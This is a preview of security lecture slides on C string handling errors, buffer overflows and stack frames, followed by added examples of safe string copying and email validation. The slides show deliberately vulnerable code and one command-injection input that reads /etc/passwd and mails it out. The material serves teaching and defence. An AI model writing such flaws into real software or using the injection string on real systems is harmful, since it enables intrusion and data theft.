Pitt IS 2150 - Race Conditions Vulnerability related Integers

This preview shows page 1-2-3-4-5-39-40-41-42-43-44-78-79-80-81-82 out of 82 pages.

Save
View full document
View full document
Premium Document
Do you want full access? Go Premium and unlock all 82 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 82 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 82 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 82 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 82 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 82 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 82 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 82 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 82 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 82 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 82 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 82 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 82 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 82 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 82 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 82 pages.
Access to all documents
Download any document
Ad free experience
Premium Document
Do you want full access? Go Premium and unlock all 82 pages.
Access to all documents
Download any document
Ad free experience

Unformatted text preview:

Slide 1
IS 2150 / TEL 2810 Introduction to Security
James Joshi, Assistant Professor, SIS
Lecture 13, Dec 6, 2007
Race Conditions, Vulnerability related Integers. String Buffer overflow

Slide 2: Objectives
- Understand/explain the issues, and utilize the techniques related to
  - Malicious code: what and how
  - Vulnerability analysis/classification: techniques, taxonomy
  - Intrusion Detection and Auditing Systems

Slide 3: Issues
- Strings
  - Background and common issues
  - Common String Manipulation Errors
  - String Vulnerabilities
  - Mitigation Strategies

Slide 4: Strings
- Comprise most of the data exchanged between an end user and a software system
  - command-line arguments
  - environment variables
  - console input
- Software vulnerabilities and exploits are caused by weaknesses in
  - string representation
  - string management
  - string manipulation

Slide 5: C-Style Strings
- Strings are a fundamental concept in software engineering, but they are not a built-in type in C or C++.
- C-style strings consist of a contiguous sequence of characters terminated by and including the first null character.
  - A pointer to a string points to its initial character.
  - String length is the number of bytes preceding the null character.
  - The string value is the sequence of the values of the contained characters, in order.
  - The number of bytes required to store a string is the number of characters plus one (times the size of each character).
[Figure: the string "hello" stored as h e l l o \0; "length" spans the five characters before the null.]

Slide 6: Common String Manipulation Errors
- Common errors include
  - Unbounded string copies
  - Null-termination errors
  - Truncation
  - Write outside array bounds
  - Off-by-one errors
  - Improper data sanitization

Slide 7: Unbounded String Copies
- Occur when data is copied from an unbounded source to a fixed length character array

    #include <stdio.h>
    int main(void) {
      char Password[80];
      puts("Enter 8 character password:");
      gets(Password);   /* no bound: input longer than 79 characters overruns Password */
      ...
    }

    #include <iostream.h>
    int main(void) {
      char buf[12];
      cin >> buf;       /* no bound: operator>> stops at whitespace, not at 11 characters */
      cout << "echo: " << buf << endl;
    }

Slide 8: Simple Solution
- Test the length of the input using strlen() and dynamically allocate the memory

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    int main(int argc, char *argv[]) {
      if (argc < 2) return 1;   /* argv[1] must exist before strlen(argv[1]) is evaluated */
      char *buff = (char *)malloc(strlen(argv[1])+1);
      if (buff != NULL) {
        strcpy(buff, argv[1]);
        printf("argv[1] = %s.\n", buff);
        free(buff);
      }
      else {
        /* Couldn't get the memory - recover */
      }
      return 0;
    }

Slide 9: Null-Termination Errors
- Another common problem with C-style strings is a failure to properly null terminate

    #include <string.h>
    int main(int argc, char* argv[]) {
      char a[16];
      char b[16];
      char c[32];
      strncpy(a, "0123456789abcdef", sizeof(a));   /* 16 characters fill a[] completely; no room for '\0' */
      strncpy(b, "0123456789abcdef", sizeof(b));   /* same for b[] */
      strncpy(c, a, sizeof(c));                    /* reads past a[] looking for a terminator */
    }

- Neither a[] nor b[] are properly terminated

Slide 10: String Truncation
- Functions that restrict the number of bytes are often recommended to mitigate against buffer overflow vulnerabilities
  - strncpy() instead of strcpy()
  - fgets() instead of gets()
  - snprintf() instead of sprintf()
- Strings that exceed the specified limits are truncated
- Truncation results in a loss of data, and in some cases, to software vulnerabilities

Slide 11: Off-by-One Errors
- Can you find all the off-by-one errors in this program?

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    int main(int argc, char* argv[]) {
      char source[10];
      strcpy(source, "0123456789");
      char *dest = (char *)malloc(strlen(source));
      int i;
      for (i=1; i <= 11; i++) {
        dest[i] = source[i];
      }
      dest[i] = '\0';
      printf("dest = %s", dest);
    }

Slide 12: Improper Data Sanitization
- An application inputs an email address from a user and writes the address to a buffer [Viega03]

    sprintf(buffer, "/bin/mail %s < /tmp/email", addr);

- The buffer is then executed using the system() call.
- The risk is, of course, that the user enters the following string as an email address:

    [email protected]; cat /etc/passwd | mail [email protected]

- [Viega 03] Viega, J., and M. Messier. Secure Programming Cookbook for C and C++: Recipes for Cryptography, Authentication, Networking, Input Validation & More. Sebastopol, CA: O'Reilly, 2003.

Slide 13: What is a Buffer Overflow?
- A buffer overflow occurs when data is written outside of the boundaries of the memory allocated to a particular data structure
[Figure: copy operation; 16 bytes of data in source memory are copied into 12 bytes of allocated destination memory, spilling into other memory.]

Slide 14: Buffer Overflows
- Caused when buffer boundaries are neglected and unchecked
- Buffer overflows can be exploited to modify a
  - variable
  - data pointer
  - function pointer
  - return address on the stack

Slide 15: Smashing the Stack
- This is an important class of vulnerability because of its frequency and potential consequences.
- Occurs when a buffer overflow overwrites data in the memory allocated to the execution stack.
- Successful exploits can overwrite the return address on the stack, allowing execution of arbitrary code on the targeted machine.

Slide 16: Program Stacks
- A program stack is used to keep track of program execution and state by storing
  - return address in the calling function
  - arguments to the functions
  - local variables (temporary)
- The stack is modified
  - during function calls
  - function initialization
  - when returning from a subroutine
[Figure: process memory layout: Code, Data, Heap, Stack.]

Slide 17: Stack Segment
- The stack supports nested invocation calls
- Information pushed on the stack as a result of a function call is called a frame
- A stack frame is created for each subroutine and destroyed upon return
[Figure: main() calls a(), which calls b(); from high memory to low memory: stack frame for main(), stack frame for a(), stack frame for b(), unallocated.]

    main() { a(); }
    a()    { b(); }
    b()    { ... }

Slide 18: Stack Frames
- The stack is used to store
  - return address in the calling function
  - actual arguments to the subroutine
  - local (automatic) variables
- The address of the current frame is stored in a register (EBP on Intel architectures)
- The frame pointer is used as a fixed point of reference within the stack
- The stack is modified during
  - subroutine calls
  - subroutine initialization
  - returning from a subroutine

Slide 19: Subroutine Calls
- function(4, 2);
    EIP = 00411A7E  ESP = 0012FE10  EBP = 0012FEDC
- push 2    ; Push 2nd arg on stack
- push 4    ; Push 1st arg on stack
    EIP = 00411A82  ESP = 0012FE08  EBP = 0012FEDC
- call function (411A29h)    ; Push the return address on stack and jump to address
- EIP: Extended Instruction Pointer; ESP: Extended Stack Pointer; EBP: Extended Base Pointer
[Slide comment by Robert C. Seacord, 7/6/2004: "draw picture of stack on right and put text in action area above registers; also, should create gdb version of this"]

Slide 20: Subroutine Initialization
- void function(int arg1, int arg2) {
    EIP = 00411A20  ESP = 0012FE04  EBP = 0012FEDC
- push ebp    ; Save the frame pointer
    EIP = 00411A21  ESP =
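An added example, not from the lecture, that applies slides 9 through 11 together: bounded_copy() terminates the destination unconditionally (which strncpy() does not) and reports truncation so the caller can treat data loss as an error, and copy_exact() is the slide 11 program with each off-by-one error corrected. Both function names are my own.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Bounded copy that, unlike strncpy(), always writes a '\0' into dst.
   Returns 1 if src did not fit and was truncated, 0 otherwise. */
int bounded_copy(char *dst, size_t dstsize, const char *src) {
    if (dstsize == 0)
        return 1;                                 /* nothing can be stored */
    size_t srclen = strlen(src);
    int truncated = srclen >= dstsize;            /* no room for srclen + '\0' */
    size_t n = truncated ? dstsize - 1 : srclen;  /* bytes actually kept */
    memcpy(dst, src, n);
    dst[n] = '\0';                                /* termination is unconditional */
    return truncated;
}

/* The slide 11 program with its off-by-one errors fixed:
   - allocate strlen(source) + 1 so the terminator has a home
   - index from 0 and stop before len, not 1..11
   - write the terminator at dest[len], the last allocated byte
   Returns a heap copy the caller must free(), or NULL if malloc() fails. */
char *copy_exact(const char *source) {
    size_t len = strlen(source);
    char *dest = malloc(len + 1);
    if (dest == NULL)
        return NULL;
    size_t i;
    for (i = 0; i < len; i++)
        dest[i] = source[i];
    dest[i] = '\0';    /* i == len here */
    return dest;
}

int main(void) {
    char a[16];        /* same size as a[] and b[] on slide 9 */
    /* 16 characters into a 16-byte buffer: strncpy() would leave no '\0' */
    int t = bounded_copy(a, sizeof a, "0123456789abcdef");
    printf("a = \"%s\" (len %zu, truncated = %d)\n", a, strlen(a), t);
    char *d = copy_exact("0123456789");
    if (d != NULL) {
        printf("dest = %s\n", d);
        free(d);
    }
    return 0;
}
```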
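An added example for slide 12, not from the lecture or from [Viega 03]: an allow-list check applied to the address before it is placed in the command string, with snprintf() in place of sprintf(). is_safe_email() and build_mail_command() are assumed names, and the addresses in main() are constructed.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Allow-list check for an address that will be placed in a shell command.
   Only letters, digits and a few address characters are accepted, exactly
   one '@' is required, and the length is capped. Shell metacharacters such
   as ';', '|', ' ' and '<' are not on the list, so they cannot pass.
   Returns 1 if the address is acceptable, 0 otherwise. */
int is_safe_email(const char *addr, size_t maxlen) {
    size_t len = strlen(addr);
    if (len == 0 || len > maxlen)
        return 0;
    int at_count = 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)addr[i];
        if (isalnum(c) || c == '.' || c == '-' || c == '_' || c == '+')
            continue;
        if (c == '@') {
            at_count++;
            continue;
        }
        return 0;   /* anything else is rejected */
    }
    return at_count == 1 && addr[0] != '@' && addr[len - 1] != '@';
}

/* Build the slide's command only after validation; snprintf() bounds the
   write and its return value exposes truncation. Returns 1 and fills cmd
   on success, 0 if the address is rejected or cmd is too small. */
int build_mail_command(char *cmd, size_t cmdsize, const char *addr) {
    if (!is_safe_email(addr, 64))
        return 0;
    int n = snprintf(cmd, cmdsize, "/bin/mail %s < /tmp/email", addr);
    return n > 0 && (size_t)n < cmdsize;
}

int main(void) {
    char cmd[128];
    /* constructed inputs: a normal address and the injection shape from slide 12 */
    const char *ok  = "alice@example.com";
    const char *bad = "alice@example.com; cat /etc/passwd | mail bob@example.com";
    printf("%s -> %s\n", ok,  build_mail_command(cmd, sizeof cmd, ok)  ? cmd : "rejected");
    printf("%s -> %s\n", bad, build_mail_command(cmd, sizeof cmd, bad) ? cmd : "rejected");
    return 0;   /* the command is never handed to system() here */
}
```

Running the result through a shell remains the weaker design; passing the address as a separate argv entry to /bin/mail via execv() avoids the shell parser altogether, and the allow-list is the minimum when the command string must be built.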